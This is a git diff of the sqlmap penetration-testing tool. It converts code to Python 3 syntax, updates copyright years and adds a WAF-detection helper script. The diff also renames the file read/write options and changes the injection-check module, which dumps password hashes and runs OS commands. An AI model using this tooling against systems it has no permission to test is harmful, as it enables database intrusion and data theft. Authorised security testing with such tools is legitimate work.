truncate -s 0 "$CHECKSUM_FULLPATH"
|
||||||
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
|
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -name "*_" -o -type f -regex "./[^./]*" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
|
||||||
|
|||||||
7
extra/shutils/pycodestyle.sh
Executable file
7
extra/shutils/pycodestyle.sh
Executable file
@@ -0,0 +1,7 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
|
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
|
||||||
|
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \;
|
||||||
@@ -3,6 +3,8 @@
|
|||||||
# Runs pylint on all python scripts found in a directory tree
|
# Runs pylint on all python scripts found in a directory tree
|
||||||
# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
|
# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
@@ -17,26 +19,26 @@ def check(module):
|
|||||||
|
|
||||||
if module[-3:] == ".py":
|
if module[-3:] == ".py":
|
||||||
|
|
||||||
print "CHECKING ", module
|
print("CHECKING ", module)
|
||||||
pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
|
pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
|
||||||
for line in pout:
|
for line in pout:
|
||||||
if re.match(r"\AE:", line):
|
if re.match(r"\AE:", line):
|
||||||
print line.strip()
|
print(line.strip())
|
||||||
if __RATING__ and "Your code has been rated at" in line:
|
if __RATING__ and "Your code has been rated at" in line:
|
||||||
print line
|
print(line)
|
||||||
score = re.findall(r"\d.\d\d", line)[0]
|
score = re.findall(r"\d.\d\d", line)[0]
|
||||||
total += float(score)
|
total += float(score)
|
||||||
count += 1
|
count += 1
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
try:
|
try:
|
||||||
print sys.argv
|
print(sys.argv)
|
||||||
BASE_DIRECTORY = sys.argv[1]
|
BASE_DIRECTORY = sys.argv[1]
|
||||||
except IndexError:
|
except IndexError:
|
||||||
print "no directory specified, defaulting to current working directory"
|
print("no directory specified, defaulting to current working directory")
|
||||||
BASE_DIRECTORY = os.getcwd()
|
BASE_DIRECTORY = os.getcwd()
|
||||||
|
|
||||||
print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
|
print("looking for *.py scripts in subdirectories of ", BASE_DIRECTORY)
|
||||||
for root, dirs, files in os.walk(BASE_DIRECTORY):
|
for root, dirs, files in os.walk(BASE_DIRECTORY):
|
||||||
if any(_ in root for _ in ("extra", "thirdparty")):
|
if any(_ in root for _ in ("extra", "thirdparty")):
|
||||||
continue
|
continue
|
||||||
@@ -45,6 +47,6 @@ if __name__ == "__main__":
|
|||||||
check(filepath)
|
check(filepath)
|
||||||
|
|
||||||
if __RATING__:
|
if __RATING__:
|
||||||
print "==" * 50
|
print("==" * 50)
|
||||||
print "%d modules found" % count
|
print("%d modules found" % count)
|
||||||
print "AVERAGE SCORE = %.02f" % (total / count)
|
print("AVERAGE SCORE = %.02f" % (total / count))
|
||||||
|
|||||||
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -25,10 +25,16 @@ from setuptools import setup, find_packages
|
|||||||
setup(
|
setup(
|
||||||
name='sqlmap',
|
name='sqlmap',
|
||||||
version='$VERSION',
|
version='$VERSION',
|
||||||
description="Automatic SQL injection and database takeover tool",
|
description='Automatic SQL injection and database takeover tool',
|
||||||
|
long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.',
|
||||||
author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
|
author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar',
|
||||||
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
|
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
|
||||||
url='https://sqlmap.org',
|
url='http://sqlmap.org',
|
||||||
|
project_urls={
|
||||||
|
'Documentation': 'https://github.com/sqlmapproject/sqlmap/wiki',
|
||||||
|
'Source': 'https://github.com/sqlmapproject/sqlmap/',
|
||||||
|
'Tracker': 'https://github.com/sqlmapproject/sqlmap/issues',
|
||||||
|
},
|
||||||
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
|
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
|
||||||
license='GNU General Public License v2 (GPLv2)',
|
license='GNU General Public License v2 (GPLv2)',
|
||||||
packages=find_packages(),
|
packages=find_packages(),
|
||||||
@@ -60,7 +66,7 @@ cat > sqlmap/__init__.py << EOF
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,10 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
# Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
# See the file 'LICENSE' for copying permission
|
# See the file 'LICENSE' for copying permission
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
import inspect
|
import inspect
|
||||||
import os
|
import os
|
||||||
@@ -27,7 +29,7 @@ SMTP_SERVER = "127.0.0.1"
|
|||||||
SMTP_PORT = 25
|
SMTP_PORT = 25
|
||||||
SMTP_TIMEOUT = 30
|
SMTP_TIMEOUT = 30
|
||||||
FROM = "regressiontest@sqlmap.org"
|
FROM = "regressiontest@sqlmap.org"
|
||||||
#TO = "dev@sqlmap.org"
|
# TO = "dev@sqlmap.org"
|
||||||
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
||||||
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
|
SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
|
||||||
TARGET = "debian"
|
TARGET = "debian"
|
||||||
@@ -56,8 +58,8 @@ def send_email(msg):
|
|||||||
s.sendmail(FROM, TO, msg.as_string())
|
s.sendmail(FROM, TO, msg.as_string())
|
||||||
s.quit()
|
s.quit()
|
||||||
# Catch all for SMTP exceptions
|
# Catch all for SMTP exceptions
|
||||||
except smtplib.SMTPException, e:
|
except smtplib.SMTPException as ex:
|
||||||
print "Failure to send email: %s" % str(e)
|
print("Failure to send email: '%s" % ex)
|
||||||
|
|
||||||
def failure_email(msg):
|
def failure_email(msg):
|
||||||
msg = prepare_email(msg)
|
msg = prepare_email(msg)
|
||||||
@@ -83,7 +85,7 @@ def main():
|
|||||||
if stderr:
|
if stderr:
|
||||||
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
|
||||||
|
|
||||||
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
|
failed_tests = re.findall(r"running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
|
||||||
|
|
||||||
for failed_test in failed_tests:
|
for failed_test in failed_tests:
|
||||||
title = failed_test[0]
|
title = failed_test[0]
|
||||||
@@ -157,7 +159,7 @@ if __name__ == "__main__":
|
|||||||
|
|
||||||
try:
|
try:
|
||||||
main()
|
main()
|
||||||
except Exception, e:
|
except Exception:
|
||||||
log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))
|
log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))
|
||||||
|
|
||||||
log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
|
log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,10 +1,12 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
import cookielib
|
import cookielib
|
||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
@@ -75,8 +77,8 @@ def main():
|
|||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except Exception, msg:
|
except Exception as ex:
|
||||||
print msg
|
print(ex)
|
||||||
|
|
||||||
if abort:
|
if abort:
|
||||||
break
|
break
|
||||||
@@ -86,7 +88,7 @@ def main():
|
|||||||
sys.stdout.write("---------------\n")
|
sys.stdout.write("---------------\n")
|
||||||
|
|
||||||
for sqlfile in files:
|
for sqlfile in files:
|
||||||
print sqlfile
|
print(sqlfile)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
req = urllib2.Request(sqlfile)
|
req = urllib2.Request(sqlfile)
|
||||||
@@ -118,8 +120,8 @@ def main():
|
|||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except Exception, msg:
|
except Exception as ex:
|
||||||
print msg
|
print(ex)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
i += 1
|
i += 1
|
||||||
|
|||||||
8
extra/wafdetectify/__init__.py
Normal file
8
extra/wafdetectify/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'LICENSE' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
134
extra/wafdetectify/wafdetectify.py
Executable file
134
extra/wafdetectify/wafdetectify.py
Executable file
@@ -0,0 +1,134 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'LICENSE' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
|
||||||
|
import cookielib
|
||||||
|
import glob
|
||||||
|
import httplib
|
||||||
|
import inspect
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import socket
|
||||||
|
import ssl
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
import urllib2
|
||||||
|
|
||||||
|
sys.dont_write_bytecode = True
|
||||||
|
|
||||||
|
if hasattr(ssl, "_create_unverified_context"):
|
||||||
|
ssl._create_default_https_context = ssl._create_unverified_context
|
||||||
|
|
||||||
|
NAME, VERSION, AUTHOR = "WAF Detectify", "0.1", "sqlmap developers (@sqlmap)"
|
||||||
|
TIMEOUT = 10
|
||||||
|
HEADERS = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "identity", "Cache-Control": "max-age=0"}
|
||||||
|
SQLMAP_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", ".."))
|
||||||
|
SCRIPTS_DIR = os.path.join(SQLMAP_DIR, "waf")
|
||||||
|
LEVEL_COLORS = {"o": "\033[00;94m", "x": "\033[00;91m", "!": "\033[00;93m", "i": "\033[00;92m"}
|
||||||
|
CACHE = {}
|
||||||
|
WAF_FUNCTIONS = []
|
||||||
|
|
||||||
|
def get_page(get=None, url=None, host=None, data=None):
|
||||||
|
key = (get, url, host, data)
|
||||||
|
|
||||||
|
if key in CACHE:
|
||||||
|
return CACHE[key]
|
||||||
|
|
||||||
|
page, headers, code = None, {}, httplib.OK
|
||||||
|
|
||||||
|
url = url or ("%s%s%s" % (sys.argv[1], '?' if '?' not in sys.argv[1] else '&', get) if get else sys.argv[1])
|
||||||
|
if not url.startswith("http"):
|
||||||
|
url = "http://%s" % url
|
||||||
|
|
||||||
|
try:
|
||||||
|
req = urllib2.Request("".join(url[_].replace(' ', "%20") if _ > url.find('?') else url[_] for _ in xrange(len(url))), data, HEADERS)
|
||||||
|
conn = urllib2.urlopen(req, timeout=TIMEOUT)
|
||||||
|
page = conn.read()
|
||||||
|
headers = conn.info()
|
||||||
|
except Exception as ex:
|
||||||
|
code = getattr(ex, "code", None)
|
||||||
|
page = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", "")
|
||||||
|
headers = ex.info() if hasattr(ex, "info") else {}
|
||||||
|
|
||||||
|
result = CACHE[key] = page, headers, code
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
def colorize(message):
|
||||||
|
if not subprocess.mswindows and sys.stdout.isatty():
|
||||||
|
message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message)
|
||||||
|
message = message.replace("@sqlmap", "\033[00;96m@sqlmap\033[00;49m")
|
||||||
|
message = message.replace(NAME, "\033[00;93m%s\033[00;49m" % NAME)
|
||||||
|
|
||||||
|
return message
|
||||||
|
|
||||||
|
def main():
|
||||||
|
global WAF_FUNCTIONS
|
||||||
|
|
||||||
|
print(colorize("%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)))
|
||||||
|
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
exit(colorize("[x] usage: python %s <hostname>" % os.path.split(__file__)[-1]))
|
||||||
|
|
||||||
|
cookie_jar = cookielib.CookieJar()
|
||||||
|
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
|
||||||
|
urllib2.install_opener(opener)
|
||||||
|
|
||||||
|
sys.path.insert(0, SQLMAP_DIR)
|
||||||
|
|
||||||
|
for found in glob.glob(os.path.join(SCRIPTS_DIR, "*.py")):
|
||||||
|
dirname, filename = os.path.split(found)
|
||||||
|
dirname = os.path.abspath(dirname)
|
||||||
|
|
||||||
|
if filename == "__init__.py":
|
||||||
|
continue
|
||||||
|
|
||||||
|
if dirname not in sys.path:
|
||||||
|
sys.path.insert(0, dirname)
|
||||||
|
|
||||||
|
try:
|
||||||
|
if filename[:-3] in sys.modules:
|
||||||
|
del sys.modules[filename[:-3]]
|
||||||
|
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or "utf8"))
|
||||||
|
except ImportError as ex:
|
||||||
|
exit(colorize("[x] cannot import WAF script '%s' (%s)" % (filename[:-3], ex)))
|
||||||
|
|
||||||
|
_ = dict(inspect.getmembers(module))
|
||||||
|
if "detect" not in _:
|
||||||
|
exit(colorize("[x] missing function 'detect(get_page)' in WAF script '%s'" % found))
|
||||||
|
else:
|
||||||
|
WAF_FUNCTIONS.append((_["detect"], _.get("__product__", filename[:-3])))
|
||||||
|
|
||||||
|
WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower())
|
||||||
|
|
||||||
|
print(colorize("[i] checking '%s'..." % sys.argv[1]))
|
||||||
|
|
||||||
|
hostname = sys.argv[1].split("//")[-1].split('/')[0]
|
||||||
|
try:
|
||||||
|
socket.getaddrinfo(hostname, None)
|
||||||
|
except socket.gaierror:
|
||||||
|
print(colorize("[x] host '%s' does not exist" % hostname))
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
found = False
|
||||||
|
for function, product in WAF_FUNCTIONS:
|
||||||
|
if found and "unknown" in product.lower():
|
||||||
|
continue
|
||||||
|
|
||||||
|
if function(get_page):
|
||||||
|
exit(colorize("[!] WAF/IPS identified as '%s'" % product))
|
||||||
|
|
||||||
|
if not found:
|
||||||
|
print(colorize("[o] nothing found"))
|
||||||
|
|
||||||
|
print()
|
||||||
|
|
||||||
|
exit(int(not found))
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -75,7 +75,7 @@ def action():
|
|||||||
if conf.getPasswordHashes:
|
if conf.getPasswordHashes:
|
||||||
try:
|
try:
|
||||||
conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
|
conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
|
||||||
except SqlmapNoneDataException, ex:
|
except SqlmapNoneDataException as ex:
|
||||||
logger.critical(ex)
|
logger.critical(ex)
|
||||||
except:
|
except:
|
||||||
raise
|
raise
|
||||||
@@ -83,7 +83,7 @@ def action():
|
|||||||
if conf.getPrivileges:
|
if conf.getPrivileges:
|
||||||
try:
|
try:
|
||||||
conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
|
conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
|
||||||
except SqlmapNoneDataException, ex:
|
except SqlmapNoneDataException as ex:
|
||||||
logger.critical(ex)
|
logger.critical(ex)
|
||||||
except:
|
except:
|
||||||
raise
|
raise
|
||||||
@@ -91,7 +91,7 @@ def action():
|
|||||||
if conf.getRoles:
|
if conf.getRoles:
|
||||||
try:
|
try:
|
||||||
conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
|
conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
|
||||||
except SqlmapNoneDataException, ex:
|
except SqlmapNoneDataException as ex:
|
||||||
logger.critical(ex)
|
logger.critical(ex)
|
||||||
except:
|
except:
|
||||||
raise
|
raise
|
||||||
@@ -140,11 +140,11 @@ def action():
|
|||||||
conf.dbmsHandler.udfInjectCustom()
|
conf.dbmsHandler.udfInjectCustom()
|
||||||
|
|
||||||
# File system options
|
# File system options
|
||||||
if conf.rFile:
|
if conf.fileRead:
|
||||||
conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
|
conf.dumper.rFile(conf.dbmsHandler.readFile(conf.fileRead))
|
||||||
|
|
||||||
if conf.wFile:
|
if conf.fileWrite:
|
||||||
conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
|
conf.dbmsHandler.writeFile(conf.fileWrite, conf.fileDest, conf.fileWriteType)
|
||||||
|
|
||||||
# Operating system options
|
# Operating system options
|
||||||
if conf.osCmd:
|
if conf.osCmd:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -13,6 +13,7 @@ import random
|
|||||||
import re
|
import re
|
||||||
import socket
|
import socket
|
||||||
import subprocess
|
import subprocess
|
||||||
|
import sys
|
||||||
import tempfile
|
import tempfile
|
||||||
import time
|
import time
|
||||||
|
|
||||||
@@ -47,6 +48,7 @@ from lib.core.common import unArrayizeValue
|
|||||||
from lib.core.common import urlencode
|
from lib.core.common import urlencode
|
||||||
from lib.core.common import wasLastResponseDBMSError
|
from lib.core.common import wasLastResponseDBMSError
|
||||||
from lib.core.common import wasLastResponseHTTPError
|
from lib.core.common import wasLastResponseHTTPError
|
||||||
|
from lib.core.convert import unicodeencode
|
||||||
from lib.core.defaults import defaults
|
from lib.core.defaults import defaults
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
@@ -54,6 +56,7 @@ from lib.core.data import logger
|
|||||||
from lib.core.datatype import AttribDict
|
from lib.core.datatype import AttribDict
|
||||||
from lib.core.datatype import InjectionDict
|
from lib.core.datatype import InjectionDict
|
||||||
from lib.core.decorators import cachedmethod
|
from lib.core.decorators import cachedmethod
|
||||||
|
from lib.core.decorators import stackedmethod
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import HASHDB_KEYS
|
from lib.core.enums import HASHDB_KEYS
|
||||||
@@ -66,11 +69,14 @@ from lib.core.enums import NULLCONNECTION
|
|||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.enums import REDIRECTION
|
from lib.core.enums import REDIRECTION
|
||||||
|
from lib.core.enums import WEB_PLATFORM
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
|
from lib.core.exception import SqlmapDataException
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapSkipTargetException
|
from lib.core.exception import SqlmapSkipTargetException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
|
from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||||
from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
|
from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
|
||||||
from lib.core.settings import CHECK_INTERNET_ADDRESS
|
from lib.core.settings import CHECK_INTERNET_ADDRESS
|
||||||
from lib.core.settings import CHECK_INTERNET_VALUE
|
from lib.core.settings import CHECK_INTERNET_VALUE
|
||||||
@@ -80,14 +86,17 @@ from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
|
|||||||
from lib.core.settings import FI_ERROR_REGEX
|
from lib.core.settings import FI_ERROR_REGEX
|
||||||
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
|
||||||
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
|
||||||
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
|
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
|
||||||
from lib.core.settings import IDS_WAF_CHECK_RATIO
|
from lib.core.settings import IDS_WAF_CHECK_RATIO
|
||||||
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
|
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
|
||||||
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
|
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
|
||||||
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
|
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
|
||||||
|
from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
|
||||||
|
from lib.core.settings import SINGLE_QUOTE_MARKER
|
||||||
from lib.core.settings import SLEEP_TIME_MARKER
|
from lib.core.settings import SLEEP_TIME_MARKER
|
||||||
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
from lib.core.settings import URI_HTTP_HEADER
|
from lib.core.settings import URI_HTTP_HEADER
|
||||||
from lib.core.settings import UPPER_RATIO_BOUND
|
from lib.core.settings import UPPER_RATIO_BOUND
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
@@ -110,6 +119,9 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
if value.isdigit():
|
if value.isdigit():
|
||||||
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
|
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
|
||||||
boundaries = kb.cache.intBoundaries
|
boundaries = kb.cache.intBoundaries
|
||||||
|
elif value.isalpha():
|
||||||
|
kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
|
||||||
|
boundaries = kb.cache.alphaBoundaries
|
||||||
else:
|
else:
|
||||||
boundaries = conf.boundaries
|
boundaries = conf.boundaries
|
||||||
|
|
||||||
@@ -143,8 +155,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# error message, simple heuristic check or via DBMS-specific
|
# error message, simple heuristic check or via DBMS-specific
|
||||||
# payload), ask the user to limit the tests to the fingerprinted
|
# payload), ask the user to limit the tests to the fingerprinted
|
||||||
# DBMS
|
# DBMS
|
||||||
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
|
if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
||||||
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
|
|
||||||
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
|
||||||
